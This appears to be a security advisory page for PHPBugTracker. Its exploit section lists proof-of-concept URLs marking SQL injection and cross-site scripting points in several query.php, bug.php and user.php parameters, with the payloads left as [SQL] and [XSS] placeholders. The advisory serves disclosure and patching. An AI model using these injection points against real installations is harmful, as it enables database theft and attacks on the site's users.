• News
• Infocus
• Foundations
• Microsoft
• Unix
• IDS
• Incidents
• Virus
• Pen-Test
• Firewalls
• Columnists
• Mailing Lists
• Newsletters
• Bugtraq
• Focus on IDS
• Focus on Linux
• Focus on Microsoft
• Forensics
• Pen-test
• Security Basics
• Vuln Dev
• Vulnerabilities
• Jobs
• Job Opportunities
• Resumes
• Job Seekers
• Employers
• Tools
• RSS
• News
• Vulns
• Security Research

• info
• discussion
• exploit
• solution
• references

PHPBugTracker Multiple Input Validation Vulnerabilities

No exploit is required to leverage these issues. The following proof of concept has been provided:

To leverage the SQL injection issues:
http://www.example.com/query.php?page=2&order=severity.sort_order&sort=[SQL]
http://www.example.com/query.php?page=2&order=[SQL]
http://www.example.com/query.php?page=[SQL]
http://www.example.com/query.php?op=delquery&queryid=[SQL]&form=simple
http://www.example.com/query.php?projects=[SQL]&op=doquery
http://www.example.com/bug.php?op=vote&bugid=[SQL]
http://www.example.com/bug.php?op=viewvotes&bugid=[SQL]
http://www.example.com/user.php?op=delvote&bugid=[SQL]

To leverage the cross-site scripting issues:
http://www.example.com/bug.php?op=show&bugid=[XSS]
http://www.example.com/query.php?page=2&order=severity.sort_order&sort=[XSS]
http://www.example.com/query.php?page=2&order=[XSS]
http://www.example.com/query.php?page=[XSS]
http://www.example.com/query.php?op=delquery&queryid=[XSS]&form=simple
http://www.example.com/query.php?projects=[XSS]&op=doquery
http://www.example.com/bug.php?op=vote&bugid=[XSS]
http://www.example.com/bug.php?op=viewvotes&bugid=[XSS]
http://www.example.com/bug.php?op=add&project=[XSS]
http://www.example.com/user.php?op=delvote&bugid=[XSS]